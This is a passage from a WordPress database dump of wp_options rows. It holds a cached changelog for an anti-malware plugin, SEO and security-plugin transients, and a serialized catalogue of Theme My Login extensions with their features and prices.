Made sure that the plugin does not check my servers for updates unless you have registered (this opt-in requirement is part of the WordPress Repository Guidelines).\n* Added exception for the social.png files to the skip files by extension list.\n* Fixed removal of Known Threats from files in the Quarantine directory.\n* Block SoakSoak and other malware from exploiting the Slider Revolution Vulnerability (THIS IS A WIDESPREAD THREAT RIGHT NOW).\n* Enabled the Brute-Force protection option directly from the Settings page.\n* Fixed window position to auto-adjust on small screens.\n\n= 4.14.47 =\n* Major upgrade to the protection for wp-login.php Brute-Force attempts.\n* Fixes a bug in setting the permissions for read-only files so that they could still be cleaned.\n* Fixes a minor bug with pass-by-reference which raises a fatal error in PHP v5.4.\n* Enhanced the Examine File window with better styles and more info.\n* Changed form submission of encrypted file lists to array values instead of keys.\n* Fixes other minor bugs.\n* Made the Examine File window sizable.\n* Fixed a few small bugs and removed some old code.\n* Added a link to my new twitter account.\n* Re-purposed Quick Scan to just scan the most affected areas.\n* Set the registration form to display by defaulted in the definition update section.\n* Fixed a few small bugs in advanced features and directory depth determination.\n* Fixed a session bug to display the last directory scanned.\n* Fixed a few small cosmetic bugs for WP 3.8.\n* Added Spanish translation, thanks to Jelena Kovacevic and Andrew Kurtis at webhostinghub.com.\n* Updated string in the code and added a .pot file to be ready for translation into other languages.\n* Added \"Select All\" checkbox to Quarantine and a new button to delete items from the Quarantine.\n* Added a trace.php file for advanced session tracking.\n* Fixed undefined index bug with menu_group item in settings array.\n* Added support for multisite network admin menu and the ability to restrict admin access.\n* Fixed a session bug in the progress bar related to the last release.\n* Fixed a session bug that conflicted with jigoshop. (Thanks dragonflyfla)\n* Fixed a few bug in the Whitelist definition feature.\n\n= 3.07.06 =\n* Added SSL support for definition updates and registration form.\n* Upgraded the Whitelist feature so the it could not contain duplicates.\n* Downgraded the WP-Login threat and changed it to an opt-in fix.\n* Fixed a bug in the Add to Whitelist feature so the you do not need to update the definitions after whitelisting a file.\n* Added ability to whitelist files.\n* Fixed a major bug in yesterdays release broke the login page on some sites.\n* Added a patch for the wp-login.php brute force attack that has been going around.\n* Created a process to restore files from the Quarantine.\n* Fixed a few other small bugs including path issues on Winblows server.\n\n= 1.3.02.15 =\n* Improved security on the Quarantine directory to fix the 500 error on some servers.\n* Fixed count of Quarantined items.\n* Added htaccess security to the Uploads directory.\n* Linked the Quarantined items to the File Examiner.\n* Added a scan category for Backdoor Scripts.\n* Consolidated the Definition Types and added a Whitelist category.\n* Completely redesigned the Definition Updates to handle incremental updates.\n* Added \"View Quarantine\" to the menu.\n* Enhanced Output Buffer to work with compression enabled (like ob_gzhandler).\n* Moved the quarantine to the uploads directory to protect against blanket inclusion.\n* Fixed Output Buffer issue for when ob_start has already been called.\n* Enhanced the Automatic Fix process to handle bad directory permissions.\n* Added more detailed error messages for different types of file errors.\n* Improved overall error handling.\n* Minor UI enhancements and a few bug fixes.\n* Completely revamped the scan engine to handle large file systems with better error handling.\n* Enhanced the results for the Automatic Fix process.\n* Fixed a few other small bugs.\n* Enhanced the iFrame for the File Viewer and Automatic Fix process.\n* Improved error handling during the scan.\n* Moved the File Viewer and Automatic Fix process into an iFrame to decrease scan time and memory usage.\n* Enhanced the Automatic Fix process for better success with read-only files.\n* Improved code cleanup process and general efficiency of the scan.\n* Encoded definition update for better compatibility with some servers that have post limitation.\n* Fixed XSS vulnerability.\n* Changed registration to allow for multiple sites/keys to be registered under one user/email.\n* Changed auto-update path to update threat level array for all new definition updates.\n* Updated timthumb replacement patch to version 2.8.10 per WordPress.org plugins requirement.\n* Fixed option to exclude directories so that the scan would not get stuck if omitted.\n* Added support for winblows servers using BACKSLASH directory structures.\n* Changed definition updates to write to the DB instead of a file.\n\n= 1.2.03.23 =\n* First versions available for WordPress (code removed, no longer compatible).\n\n== Upgrade Notice ==\n\n= 4.20.72 =\nUpdated registration form, fixed session check, and removed older code from WordPress Repository.\n\n= 4.20.59 =\nVarious minor bug fixes, added Core Files Definitions for ClassicPress, and tweaked code for better compatibility with WordPress 5.7.2 and ClassicPress 1.2.0.\n\n= 4.19.69 =\nFixed a JavaScript error caused by a new French translation and checked code for compatibility with WordPress 5.4.1.\n\n= 4.19.68 =\nUpdated some external links and tweaked code for better compatibility with PHP 7.4 and WordPress 5.4.\n\n= 4.19.50 =\nAdded even more error handling to the DB Scan for low memory_limit, modified the Directory Scan Depth to accept 0 as way to skip the Directory Scan, and added some Help tips to some of the options on the Settings page.\n\n= 4.19.44 =\nUpdated links, added more error handling to the DB Scan, various performance improvements, fixed path to work on Windows servers and a few minor bugs causing PHP Notices, and weaked code for compatibility with WP 5.3 (latest release).\n\n= 4.18.76 =\nCleaned up the Nonce Token code and Quarantine page, fixed recovery link, and added debugging for login errors plus WP head and footer Hooks.\n\n= 4.18.74 =\nFixed a bug in the Nonce Token Errors that was created by changes in the last release.\n\n= 4.18.71 =\nAdded wp_options table to the db_scan and fixed a few minor bugs in the quarantine view, and changed some wording and checked code for compatibility with WP 5.2.1 (latest release).\n\n= 4.18.69 =\nAdded a Warning message about the vulnerability in the yuzo-related-post plugin,  updated the Quarantine interface with a re-scan / re-clean feature, fixed a bug in the scan depth array that would produce PHP Notices, changed some wording and other minor fomatting issues, and checked code for compatibility with WP 5.2 (latest release).\n\n= 4.18.63 =\nFixed a major bug in the Firewall updates that could cause a False Positive lockout.\n\n= 4.18.62 =\nFixed a few minor bugs and updated code for compatibility with WP 5.1.1 (latest release).\n\n= 4.18.52 =\nAdded a whole new DB Scan category, updated Firewall landing page, removed some old code that was no longer needed, clear cache files before running the Complete Scan,, and updated code for compatibility with WP 5.0.2 (latest release).\n\n= 4.17.69 =\nUpdated code for compatibility with WP 4.9.8, fixed PHP Notice and escaped single-quotes in translated strings.\n\n= 4.17.68 =\nUpdated code for compatibility with WP 4.9.7, removed dashicon from Settings link and the broken vote WORKS link, and reordered priorety on fixing Known Threats.\n\n= 4.17.58 =\nUpdated code for compatibility with WP 4.9.4, fixed dashicons sizing in css, add ability to update registration email from within the plugin settings, and cleaned up expired nonce tokens left behind from an older version.\n\n= 4.17.57 =\nUpdated code for compatibility with WP 4.9.3, fixed registration form and alternate domain for definition updates to work on HTTPS, and fixed the wording on the Title Check error message.\n\n= 4.17.44 =\nAdded Title check to make sure it does say you were hacked, updated code for compatibility with WP 4.8.3 and fixed Undefined variable error in Quarantine and an XSS vulnerability in nonce error output.\n\n= 4.17.29 =\nChanged the definition update URL to only use SSL when required, and updated PayPal form for better domestic IPN compatibility.\n\n= 4.17.28 =\nAdded the Turkish translation thanks to Umut Can Alparslan, improved the auto update feature, and fixed the admin username change feature on multisite installs (Plus many other improvement from v4.16.X: see Changelog for details).\n\n= 4.16.17 =\nRemoved Menu Item Placement Options that were deprecated in WP 4.5, Added firewall options for better compatibility with WP Firewall 2, and fixed an XSS vulnerability in the debug output of the nonce token (Plus many other improvement from v4.15.X: see Changelog for details).\n\n= 4.15.16 =\nCreated automatic definition updates that include WordPress Core files, more improvements to the Brute-Force protection patch (Plus many other improvement from v4.14.X: see Changelog for details).\n\n= 4.14.47 =\nMajor upgrade to the protection for Brute-Force attempts, and a bug fix for resetting the permissions of read-only files (Plus many other improvement from v3.X: see Changelog for details).\n\n= 3.07.06 =\nAdded SSL support for definition updates and upgraded the Whitelist feature (Plus many other improvement from v1.3.X: see Changelog for details).\n\n= 1.3.02.15 =\nImproved security on the Quarantine directory to fix the 500 error on some servers (Plus many other improvement from v1.2.X: see Changelog for details).\n\n= 1.2.03.23 =\nFirst versions available for WordPress (code removed, no longer compatible).\n\";}}','no'),(510134,'_transient_timeout_wpseo_total_unindexed_post_type_archives','1632369627','no'),(510135,'_transient_wpseo_total_unindexed_post_type_archives','1','no'),(510136,'_transient_timeout_wpseo_unindexed_post_link_count','1632369627','no'),(510137,'_transient_wpseo_unindexed_post_link_count','0','no'),(510138,'_transient_timeout_wpseo_unindexed_term_link_count','1632369627','no'),(510139,'_transient_wpseo_unindexed_term_link_count','55','no'),(510224,'_site_transient_timeout_itsec_ipcheck_71.120.26.35','1632315709','no'),(510225,'_site_transient_itsec_ipcheck_71.120.26.35','a:3:{s:5:\"block\";b:0;s:9:\"cache_ttl\";i:1632315704;s:10:\"report_ttl\";i:0;}','no'),(510227,'_site_transient_timeout_browser_c13b7200c84cded4537ab2a9bd2a7ad6','1632916913','no'),(510228,'_site_transient_browser_c13b7200c84cded4537ab2a9bd2a7ad6','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:12:\"93.0.4577.82\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(510229,'_site_transient_timeout_tml_extensions_feed-cae96a2d942fdf2699534023b6a11d31','1632355313','no'),(510230,'_site_transient_tml_extensions_feed-cae96a2d942fdf2699534023b6a11d31','a:12:{i:0;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:743960;s:4:\"slug\";s:9:\"mailchimp\";s:5:\"title\";s:9:\"Mailchimp\";s:11:\"create_date\";s:19:\"2019-09-13 17:14:17\";s:13:\"modified_date\";s:19:\"2021-02-08 19:57:28\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:46:\"https://thememylogin.com/extensions/mailchimp/\";s:7:\"content\";s:288:\"Allows your users to subscribe to your Mailchimp mailing lists upon registration.\r\n<ul>\r\n 	<li>Subscribe your users to one or more lists upon registration</li>\r\n 	<li>Automatic list subscription, or utilize an opt-in checkbox</li>\r\n 	<li>Optionally require first and last name</li>\r\n</ul>\";s:7:\"excerpt\";s:81:\"Allows your users to subscribe to your Mailchimp mailing lists upon registration.\";s:9:\"thumbnail\";s:62:\"https://cdn.thememylogin.com/uploads/edd/2019/09/mailchimp.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.0.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:1;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:728516;s:4:\"slug\";s:9:\"favorites\";s:5:\"title\";s:9:\"Favorites\";s:11:\"create_date\";s:19:\"2019-03-16 19:19:27\";s:13:\"modified_date\";s:19:\"2020-11-12 00:52:30\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:46:\"https://thememylogin.com/extensions/favorites/\";s:7:\"content\";s:482:\"Allow your users to curate their favorite posts by adding a \"favorite\" button to your posts.\r\n<ul>\r\n 	<li>Choose between the default heart icon, or change it to a star or thumbs-up to create a \"like\" system</li>\r\n 	<li>Use the [tml-favorites-link] shortcode to manually add the link to a post</li>\r\n 	<li>Use the [tml-favorites-list] shortcode to add the users favorite list to any page</li>\r\n 	<li>Utilize the widget to add the users favorite list anywhere on your site</li>\r\n</ul>\";s:7:\"excerpt\";s:79:\"Allow your users to favorite posts by adding a \"favorite\" button to your posts.\";s:9:\"thumbnail\";s:62:\"https://cdn.thememylogin.com/uploads/edd/2019/03/favorites.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.0.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:2;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:726906;s:4:\"slug\";s:7:\"avatars\";s:5:\"title\";s:7:\"Avatars\";s:11:\"create_date\";s:19:\"2019-02-24 22:04:02\";s:13:\"modified_date\";s:19:\"2020-11-12 00:52:02\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:44:\"https://thememylogin.com/extensions/avatars/\";s:7:\"content\";s:260:\"Allow your users to upload their own avatars to your site.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Users can upload their own avatars</li>\r\n 	<li>Administrators and upload and remove user avatars</li>\r\n 	<li>Disable WP\'s default use of the Gravatar service</li>\r\n</ul>\";s:7:\"excerpt\";s:58:\"Allow your users to upload their own avatars to your site.\";s:9:\"thumbnail\";s:60:\"https://cdn.thememylogin.com/uploads/edd/2019/02/avatars.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.0.3\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:3;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:1027;s:4:\"slug\";s:6:\"social\";s:5:\"title\";s:6:\"Social\";s:11:\"create_date\";s:19:\"2018-09-27 01:27:24\";s:13:\"modified_date\";s:19:\"2020-11-12 00:51:34\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:43:\"https://thememylogin.com/extensions/social/\";s:7:\"content\";s:300:\"Allow your users to log in to your site with their favorite social providers.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Allow users to log in with Facebook</li>\r\n 	<li>Allow users to log in with Twitter</li>\r\n 	<li>Allow users to log in with Google</li>\r\n 	<li>Names are also populated, if provided</li>\r\n</ul>\";s:7:\"excerpt\";s:77:\"Allow your users to log in to your site with their favorite social providers.\";s:9:\"thumbnail\";s:59:\"https://cdn.thememylogin.com/uploads/edd/2018/06/social.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"15.00\";s:8:\"2-5sites\";s:5:\"30.00\";s:14:\"unlimitedsites\";s:5:\"45.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:3:\"1.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:4;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:82070;s:4:\"slug\";s:3:\"2fa\";s:5:\"title\";s:3:\"2FA\";s:11:\"create_date\";s:19:\"2018-07-20 11:00:05\";s:13:\"modified_date\";s:19:\"2020-12-10 17:24:11\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:40:\"https://thememylogin.com/extensions/2fa/\";s:7:\"content\";s:394:\"Give your users peace of mind by allowing them to enable 2-factor authentication (2FA) on their account.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Users can opt-in to two-factor authentication</li>\r\n 	<li>Once enabled, users will need to enter a code from an app on their mobile device to log in</li>\r\n 	<li>Supports multiple authenticator apps, including Google Authenticator, Authy and more</li>\r\n</ul>\";s:7:\"excerpt\";s:65:\"Allow users to enable two-factor authentication on their account.\";s:9:\"thumbnail\";s:56:\"https://cdn.thememylogin.com/uploads/edd/2018/07/2fa.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.0.4\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:5;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:103;s:4:\"slug\";s:12:\"restrictions\";s:5:\"title\";s:12:\"Restrictions\";s:11:\"create_date\";s:19:\"2018-06-01 15:07:21\";s:13:\"modified_date\";s:19:\"2020-11-12 00:50:24\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:49:\"https://thememylogin.com/extensions/restrictions/\";s:7:\"content\";s:915:\"With the Restrictions extension, you can restrict your entire site, or pieces of it in a highly configurable way.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Restrict entire site from unauthenticated users</li>\r\n 	<li>Require users to be logged in to view specific posts or pages</li>\r\n 	<li>Require specific roles to view specific posts or pages</li>\r\n 	<li>Configure nav menu items to display only if a user is logged or not logged in</li>\r\n 	<li>Configure nav menu items to display only for specified user roles</li>\r\n 	<li>Configure widgets to display only if a user is logged or not logged in</li>\r\n 	<li>Configure widgets to display only for specified user roles</li>\r\n 	<li>Use the `[tml-require-role]` shortcode to restrict content within a post or page to a specific role</li>\r\n 	<li>Use the `[tml-require-user]` shortcode to restrict content within a post or page to a specific user or all logged in users</li>\r\n</ul>\";s:7:\"excerpt\";s:78:\"Restrict posts, pages, pieces of content and menu items by user role and more.\";s:9:\"thumbnail\";s:65:\"https://cdn.thememylogin.com/uploads/edd/2018/06/restrictions.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:3:\"1.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:6;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:83;s:4:\"slug\";s:13:\"legacy-bundle\";s:5:\"title\";s:13:\"Legacy Bundle\";s:11:\"create_date\";s:19:\"2018-06-01 10:10:23\";s:13:\"modified_date\";s:19:\"2019-06-11 20:03:24\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:50:\"https://thememylogin.com/extensions/legacy-bundle/\";s:7:\"content\";s:634:\"Get all 6 \"legacy\" extensions for a <strong>30% discount</strong>. This bundle includes the following extensions:\r\n<ul>\r\n 	<li><a href=\"https://thememylogin.com/extensions/moderation/\">Moderation</a></li>\r\n 	<li><a href=\"https://thememylogin.com/extensions/notifications/\">Notifications</a></li>\r\n 	<li><a href=\"https://thememylogin.com/extensions/profiles/\">Profiles</a></li>\r\n 	<li><a href=\"https://thememylogin.com/extensions/recaptcha/\">reCAPTCHA</a></li>\r\n 	<li><a href=\"https://thememylogin.com/extensions/redirection/\">Redirection</a></li>\r\n 	<li><a href=\"https://thememylogin.com/extensions/security/\">Security</a></li>\r\n</ul>\";s:7:\"excerpt\";s:51:\"Get all six \"legacy\" extensions for a 30% discount.\";s:9:\"thumbnail\";s:66:\"https://cdn.thememylogin.com/uploads/edd/2018/06/legacy-bundle.png\";s:8:\"category\";b:0;s:4:\"tags\";b:0;}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"49.00\";s:8:\"2-5sites\";s:5:\"70.00\";s:14:\"unlimitedsites\";s:6:\"175.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:0:\"\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:7;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:38;s:4:\"slug\";s:10:\"moderation\";s:5:\"title\";s:10:\"Moderation\";s:11:\"create_date\";s:19:\"2018-05-28 04:15:16\";s:13:\"modified_date\";s:19:\"2021-04-12 17:07:14\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:47:\"https://thememylogin.com/extensions/moderation/\";s:7:\"content\";s:769:\"Cut down unwanted spam registrations by requiring your users to activate their account by clicking a link sent to their email address. Take it a step further and require admin approval before allowing users access to your site. Double the protection by requiring both.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Require new users to confirm their email address in order to activate their account</li>\r\n 	<li>Administrators can resend activation emails to remind users to activate their account</li>\r\n 	<li>Users can request to resend their activation email if they attempt to login while pending activation</li>\r\n 	<li>Require new users to be approved by an administrator</li>\r\n 	<li>Require new users to confirm their email address and be approved by an administrator</li>\r\n</ul>\";s:7:\"excerpt\";s:69:\"Require users to confirm their email address or be manually approved.\";s:9:\"thumbnail\";s:63:\"https://cdn.thememylogin.com/uploads/edd/2018/05/moderation.png\";s:8:\"category\";b:0;s:4:\"tags\";a:1:{i:0;O:8:\"stdClass\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:6:\"legacy\";s:4:\"slug\";s:6:\"legacy\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:12:\"download_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:6;s:6:\"filter\";s:3:\"raw\";}}}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.1.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:8;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:55;s:4:\"slug\";s:8:\"security\";s:5:\"title\";s:8:\"Security\";s:11:\"create_date\";s:19:\"2018-05-28 01:31:46\";s:13:\"modified_date\";s:19:\"2021-04-12 12:43:12\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:45:\"https://thememylogin.com/extensions/security/\";s:7:\"content\";s:518:\"Help secure your website by throttling and blocking IP addresses after a predetermined amount of failed login attempts.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Set the number of failed attempts required for lockout</li>\r\n 	<li>Set the period of time the failed attempts must span to be locked out</li>\r\n 	<li>Set the duration of the lockout</li>\r\n 	<li>Automatically lockout invalid usernames</li>\r\n 	<li>Manually lock and unlock specific users</li>\r\n 	<li>Disable wp-login.php</li>\r\n 	<li>Enforce strong passwords</li>\r\n</ul>\";s:7:\"excerpt\";s:53:\"Help secure your website with brute force protection.\";s:9:\"thumbnail\";s:61:\"https://cdn.thememylogin.com/uploads/edd/2018/05/security.png\";s:8:\"category\";b:0;s:4:\"tags\";a:1:{i:0;O:8:\"stdClass\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:6:\"legacy\";s:4:\"slug\";s:6:\"legacy\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:12:\"download_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:6;s:6:\"filter\";s:3:\"raw\";}}}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:5:\"1.1.4\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:9;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:52;s:4:\"slug\";s:11:\"redirection\";s:5:\"title\";s:11:\"Redirection\";s:11:\"create_date\";s:19:\"2018-05-28 01:29:28\";s:13:\"modified_date\";s:19:\"2020-11-12 00:48:33\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:48:\"https://thememylogin.com/extensions/redirection/\";s:7:\"content\";s:487:\"Don\'t want your users being redirected to the Dashboard upon login? Want to redirect them back where they came from instead? Want to send Subscribers to one place and Authors to another? You need the Redirection extension.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Specify where users are redirected upon login</li>\r\n 	<li>Specify where users are redirected upon logout</li>\r\n 	<li>Specify where users are redirected upon registration</li>\r\n 	<li>Manage redirection rules per user role</li>\r\n</ul>\";s:7:\"excerpt\";s:57:\"Redirect users upon login and logout based on their role.\";s:9:\"thumbnail\";s:64:\"https://cdn.thememylogin.com/uploads/edd/2018/05/redirection.png\";s:8:\"category\";b:0;s:4:\"tags\";a:1:{i:0;O:8:\"stdClass\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:6:\"legacy\";s:4:\"slug\";s:6:\"legacy\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:12:\"download_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:6;s:6:\"filter\";s:3:\"raw\";}}}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:3:\"1.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:10;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:49;s:4:\"slug\";s:9:\"recaptcha\";s:5:\"title\";s:9:\"reCAPTCHA\";s:11:\"create_date\";s:19:\"2018-05-28 01:27:10\";s:13:\"modified_date\";s:19:\"2020-11-12 00:47:48\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:46:\"https://thememylogin.com/extensions/recaptcha/\";s:7:\"content\";s:464:\"Keep spam bots at bay by utilizing Google reCAPTCHA on your registration and login forms.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Require reCAPTCHA on your registration form</li>\r\n 	<li>Require reCAPTCHA on your login form</li>\r\n 	<li>Require reCAPTCHA on your lost password form</li>\r\n 	<li>Require reCAPTCHA on your comment form</li>\r\n 	<li>Choose your reCAPTCHA theme</li>\r\n 	<li>reCAPTCHA will be localized if the translation exists for the selected locale</li>\r\n</ul>\";s:7:\"excerpt\";s:69:\"Enable Google reCAPTCHA support on your registration and login forms.\";s:9:\"thumbnail\";s:62:\"https://cdn.thememylogin.com/uploads/edd/2018/05/recaptcha.png\";s:8:\"category\";b:0;s:4:\"tags\";a:1:{i:0;O:8:\"stdClass\":10:{s:7:\"term_id\";i:7;s:4:\"name\";s:6:\"legacy\";s:4:\"slug\";s:6:\"legacy\";s:10:\"term_group\";i:0;s:16:\"term_taxonomy_id\";i:7;s:8:\"taxonomy\";s:12:\"download_tag\";s:11:\"description\";s:0:\"\";s:6:\"parent\";i:0;s:5:\"count\";i:6;s:6:\"filter\";s:3:\"raw\";}}}s:7:\"pricing\";O:8:\"stdClass\":3:{s:10:\"singlesite\";s:5:\"10.00\";s:8:\"2-5sites\";s:5:\"25.00\";s:14:\"unlimitedsites\";s:5:\"40.00\";}s:9:\"licensing\";O:8:\"stdClass\":4:{s:7:\"enabled\";b:1;s:7:\"version\";s:3:\"1.1\";s:8:\"exp_unit\";s:5:\"years\";s:10:\"exp_length\";s:1:\"1\";}}i:11;O:8:\"stdClass\":3:{s:4:\"info\";O:8:\"stdClass\":12:{s:2:\"id\";i:46;s:4:\"slug\";s:8:\"profiles\";s:5:\"title\";s:8:\"Profiles\";s:11:\"create_date\";s:19:\"2018-05-28 01:24:30\";s:13:\"modified_date\";s:19:\"2020-11-12 00:47:18\";s:6:\"status\";s:7:\"publish\";s:4:\"link\";s:45:\"https://thememylogin.com/extensions/profiles/\";s:7:\"content\";s:495:\"If you\'re already utilizing Theme My Login to keep your login experience within your theme, you should be using the Profiles extension to keep your user\'s profile within it as well. If Theme My Login is the peanut butter, the Profiles extension is the jelly - they just go together.\r\n<h5>Features</h5>\r\n<ul>\r\n 	<li>Set which roles get front-end profiles</li>\r\n 	<li>Restrict specific roles from the admin area</li>\r\n 	<li>Designed to work with any theme</li>\r\n 	<li>Easily extensible</li>\r\n</ul>\";s:7:\"excerpt\";s:69:\"Allow your users to edit their profile on the front-end of your 